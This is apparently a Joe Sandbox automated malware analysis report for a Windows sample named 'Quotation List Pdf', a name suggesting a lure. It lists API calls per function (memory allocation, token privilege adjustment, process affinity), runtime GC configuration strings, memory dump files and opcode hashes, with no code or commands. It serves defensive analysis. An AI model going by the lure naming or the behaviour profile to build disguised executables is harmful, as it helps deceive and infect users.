                                                      • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D0FB
                                                        • Part of subcall function 00007FF768442B90: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442B9F
                                                        • Part of subcall function 00007FF768442B90: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442BDD
                                                        • Part of subcall function 00007FF768442B90: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C09
                                                        • Part of subcall function 00007FF768442B90: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C1A
                                                        • Part of subcall function 00007FF768442B90: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C29
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D16D
                                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF76843D180
                                                      • QueryInformationJobObject.KERNEL32 ref: 00007FF76843D1CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                      • String ID: PROCESSOR_COUNT
                                                      • API String ID: 1701933505-4048346908
                                                      • Opcode ID: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
                                                      • Instruction ID: ce64fb5b53e04c884c58b28c7e2abbc1cbe57fb74867e0d226a42795ad020953
                                                      • Opcode Fuzzy Hash: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
                                                      • Instruction Fuzzy Hash: 32316031A08A42C7EF54BF52E8803B9EBA1EF84798FC40535D64D57695DF2CE4098B68

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF768433726
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise$Sleep
                                                      • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                      • API String ID: 3706814929-926682358
                                                      • Opcode ID: 6d01acea836dd96b47c2c5e0993a22bc70c2472d024c1f230ebefcf46e4bbae2
                                                      • Instruction ID: cc4e02bffcfea0335bfed2a05f729184160e821c137e72df8b6a4391dd818e08
                                                      • Opcode Fuzzy Hash: 6d01acea836dd96b47c2c5e0993a22bc70c2472d024c1f230ebefcf46e4bbae2
                                                      • Instruction Fuzzy Hash: B9410A72A08A46C7FBA0AF16F540369F7A1EF047C8F848139CA4D463A1DF3DE955C668

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                      • String ID:
                                                      • API String ID: 2150560229-0
                                                      • Opcode ID: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
                                                      • Instruction ID: 6d9420ab739dc9b7a194452587f727e429facc3fe4740e5c6d43dd754b07b093
                                                      • Opcode Fuzzy Hash: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
                                                      • Instruction Fuzzy Hash: 87E065A9E55702C2FB14AF21A814335D350BF98B85F885038DD4E06351DF3C91454D28

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 3261791682-2766056989
                                                      • Opcode ID: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
                                                      • Instruction ID: c5e36e26c28d6779333897a9ff0477391c7c6f67051f36ad6c5aac88585b9b18
                                                      • Opcode Fuzzy Hash: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
                                                      • Instruction Fuzzy Hash: AC41E421A09B6681EA56EF369110339DA92EF5DBC0F5CC731D90EA6744FF3CE4858A24

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Count64Tick
                                                      • String ID: D)
                                                      • API String ID: 1927824332-848725745
                                                      • Opcode ID: 738b33bdc5b30434fa873a3cc482db2f0a1aff3c0c979400cab83d7b5406ce2f
                                                      • Instruction ID: 96398dcfbc00da20b2fab7a6241b697706c3ed67d28c163367539d2b386793df
                                                      • Opcode Fuzzy Hash: 738b33bdc5b30434fa873a3cc482db2f0a1aff3c0c979400cab83d7b5406ce2f
                                                      • Instruction Fuzzy Hash: EB41A031E49646C5FA61BF20E844279EA92EF40B80FEC4436C90D526A2DE3DF548C3AD

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF768446968,?,?,0000000B,00007FF768445830,?,?,00000000,00007FF76843FBF1), ref: 00007FF768442E37
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF768446968,?,?,0000000B,00007FF768445830,?,?,00000000,00007FF76843FBF1), ref: 00007FF768442E57
                                                      • VirtualAllocExNuma.KERNEL32 ref: 00007FF768442E78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual$CurrentNumaProcess
                                                      • String ID:
                                                      • API String ID: 647533253-0
                                                      • Opcode ID: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
                                                      • Instruction ID: 31abebf154bb666c4093261adc46e46b32ab68380da57a52192ff340d8393228
                                                      • Opcode Fuzzy Hash: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
                                                      • Instruction Fuzzy Hash: 43F0AF71B186A1C2EB209F06F400219E760EF49BD5F584138EF8C17B68CF3DC5818B18

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Virtual$AllocFree
                                                      • String ID:
                                                      • API String ID: 2087232378-0
                                                      • Opcode ID: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
                                                      • Instruction ID: 32ac553cb699f9489ebfc282ee18b6ab5e571c72b4e3901985e81bda92588f83
                                                      • Opcode Fuzzy Hash: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
                                                      • Instruction Fuzzy Hash: 65E0C228F1A111C2EB18AB12A885664D6916F4DB04FD48038C50D43360EE2DA15B8F74

                                                      Control-flow Graph

                                                      APIs
                                                      • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF7684DCE70,?,?,00000030), ref: 00007FF7684DD029
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: d260e6bf7434607846c4d61dd018d3f30570e5d6e4ce6bbd326d91653f400847
                                                      • Instruction ID: a443542a5561bba70721b649b625379af9ad783a81e9ec7f780728a6c1cc6a4b
                                                      • Opcode Fuzzy Hash: d260e6bf7434607846c4d61dd018d3f30570e5d6e4ce6bbd326d91653f400847
                                                      • Instruction Fuzzy Hash: A131C622E08656C6FB51BF52E8413FDEA606F84794FC40035DE0D17786EE2CE886C364

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                      • String ID:
                                                      • API String ID: 2131581837-0
                                                      • Opcode ID: c64ecd0e409d3fcf1060a1dc3232f901697416edb1e454c4f82bff6a62ba27d3
                                                      • Instruction ID: b32682b826cc4264c7653a22068be22ca43ca84618c91e12c695758c55f5a845
                                                      • Opcode Fuzzy Hash: c64ecd0e409d3fcf1060a1dc3232f901697416edb1e454c4f82bff6a62ba27d3
                                                      • Instruction Fuzzy Hash: 02113A72908B8182EA64EF26E4051AAF750FB457B0F944339E6BD076D6DF38D5468704
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
                                                      • Instruction ID: 35a63cb78e94622acd83a5af9ac89f9fd4fb62287b3dc19ee7a9056377c33782
                                                      • Opcode Fuzzy Hash: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
                                                      • Instruction Fuzzy Hash: C5B01204F1A011C2E30437237CC2B0C42142F09B12FC40028C608A1350CD2C81E51F35
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                                                      • API String ID: 0-1379766591
                                                      • Opcode ID: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
                                                      • Instruction ID: 4501e2e77913fa773e04c953ddd829dea260c5f93129bf0246e31ff378972413
                                                      • Opcode Fuzzy Hash: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
                                                      • Instruction Fuzzy Hash: 0E425F71608A56C2FB20AB15F850AA9E3A6FF497C8FC55132D98C07B25DF3CD21AC758
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                      • API String ID: 1004003707-1492036319
                                                      • Opcode ID: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
                                                      • Instruction ID: a1cf7237fa49be065fa629657daa09050e1818609089fa7e35e125b2420fe803
                                                      • Opcode Fuzzy Hash: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
                                                      • Instruction Fuzzy Hash: A8627060D0DA87D0FA00FB66E8515A5EBE3AF69788FC44136C44D47273DE6CA169C3B8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                      • String ID: SeLockMemoryPrivilege
                                                      • API String ID: 1752251271-475654710
                                                      • Opcode ID: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
                                                      • Instruction ID: 9dfa5847cf3c8c8279e2bdcbf7affefc44b144504dd6a51bf57a1eab24f6673b
                                                      • Opcode Fuzzy Hash: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
                                                      • Instruction Fuzzy Hash: 4931A631A1CA42C6FB20AFA1E44477AE7A1EF84B84F844139DA4D0775ADF7DD4488F24
                                                      APIs
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF768436F88
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684370DB
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684371B3
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF7684371C9
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF768437871), ref: 00007FF768437245
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise
                                                      • String ID: [ KeepUnwinding ]
                                                      • API String ID: 2546344036-400895726
                                                      • Opcode ID: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
                                                      • Instruction ID: 1257da521ae59b097a6387879aee392e978579f5f1d6fd4b79212c255914c8f0
                                                      • Opcode Fuzzy Hash: a194a7c0d0f8bf0d13eda8b02fc6739eea9f927413269e725c7a1e9c4323ee48
                                                      • Instruction Fuzzy Hash: 7AB15B32A09B42C2EB94EF22D4802A9FBA1FF44B88F984136DE8D17394DF39D455C764
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
                                                      • Instruction ID: bb1c1dc350dd8ea9bff98dc91c01cbadc17ea90c3bdf7c1acd785076f82ab97a
                                                      • Opcode Fuzzy Hash: 78dc8e12354e733f786b704134a88d0c69524484bd1249ff473f58f1b1045164
                                                      • Instruction Fuzzy Hash: 47117022B54F02CAFB00EF60E8542B9B3A4FB18758F840E35DA2D467A4DF7CD1588760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: 9c30da41b46e678a752cba94ff24b9c9e844bb868ff036e56f0bec62d5d1427a
                                                      • Instruction ID: 155445faf967ae3bc53b9721e0e7b122897c29c733bbc205558e7ebfd0ce8f95
                                                      • Opcode Fuzzy Hash: 9c30da41b46e678a752cba94ff24b9c9e844bb868ff036e56f0bec62d5d1427a
                                                      • Instruction Fuzzy Hash: 0FB17CB1E09A82C6EB54AF24D4443B8F7A1FF04B98F844536DA1D57396DF3CE49083A8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: @
                                                      • API String ID: 3168844106-2766056989
                                                      • Opcode ID: 5db7b6a377614d9f480f265109a2fe80749a182d1a3adcd727705f5ae378369e
                                                      • Instruction ID: 14d64f5e585d054362f6ea03f9a1bd0125e949ee31136982cdd79712b7f1d245
                                                      • Opcode Fuzzy Hash: 5db7b6a377614d9f480f265109a2fe80749a182d1a3adcd727705f5ae378369e
                                                      • Instruction Fuzzy Hash: 3F914A21E1C642C1FB60BF15E844379EBA2EF44B88F980435D91D976AADE2CF484C778
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
                                                      • Instruction ID: f37e6cfae3736b2ea820a0f26b024879dd74ef1b6eb1572f5f62d1c586309eeb
                                                      • Opcode Fuzzy Hash: c2dd94c7d96df3f2775cdd799debc1e0e9d9a61e5e2074260edde2e60430f6ac
                                                      • Instruction Fuzzy Hash: 4FE19372A09A81C6EB60DF15E8803A9FBA1FF44B94FA44131DA5D53789DF3CE481C768
                                                      APIs
                                                      • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF76843828B,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76844211F
                                                      • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF76843828B,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76844217C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: EnabledFeaturesState
                                                      • String ID:
                                                      • API String ID: 1557480591-0
                                                      • Opcode ID: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
                                                      • Instruction ID: 751df0d15d9356d66a26a92e5e8f48ac366c314f6ec93c897df0574b7defbded
                                                      • Opcode Fuzzy Hash: 72210cc46d501d66917d4aa4741235ebaad592b546a2f8b3c708735d4c7245cd
                                                      • Instruction Fuzzy Hash: 0251D332F0823382FF6858599459335CA87AFE9350FCA8538DA5FD32C2CD7EA8464128
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d59cc5cb1b18531cba8ca60925d5e3cb69ecf232ff52c5df66362fa8286c3256
                                                      • Instruction ID: 81ce64e3542a559dcb858a63b66df71697b845ec69e0179ece1aa64f8da95465
                                                      • Opcode Fuzzy Hash: d59cc5cb1b18531cba8ca60925d5e3cb69ecf232ff52c5df66362fa8286c3256
                                                      • Instruction Fuzzy Hash: CD419C22B18A96C1FB10AF26D54017DEBA1FF48BC4F885136DE4C57A5ADF3CE0118768
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
                                                      • Instruction ID: a32e3d36d8a9578299febb3bb943ac1437feac3fb4ebe5567e164162b95bee25
                                                      • Opcode Fuzzy Hash: d80cb2096afa2d96802b29f732793f8d2c2ea0a515708a2f5b61d075e09ca355
                                                      • Instruction Fuzzy Hash: 36429472A19A86C1EA60AF15E450278FBA1FF45BE4F854632CA6D177D1CF3CE490C368
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?
                                                      • API String ID: 0-1684325040
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      APIs
                                                      • GetLocaleInfoEx.KERNEL32(?,?,?,?,?,00000010,0000016FC74002C0,?,?,00000000,?,?,00007FF7684CE953), ref: 00007FF768500D86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Similarity
                                                      • API ID: CounterPerformanceQuery
                                                      • String ID:
                                                      • API String ID: 2783962273-0
                                                      • Instruction Fuzzy Hash: 6AC19B32A08A46C1EA41AF15E854278FBA6FF05BA4F844736CE6D477A1DF3CE054C369
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
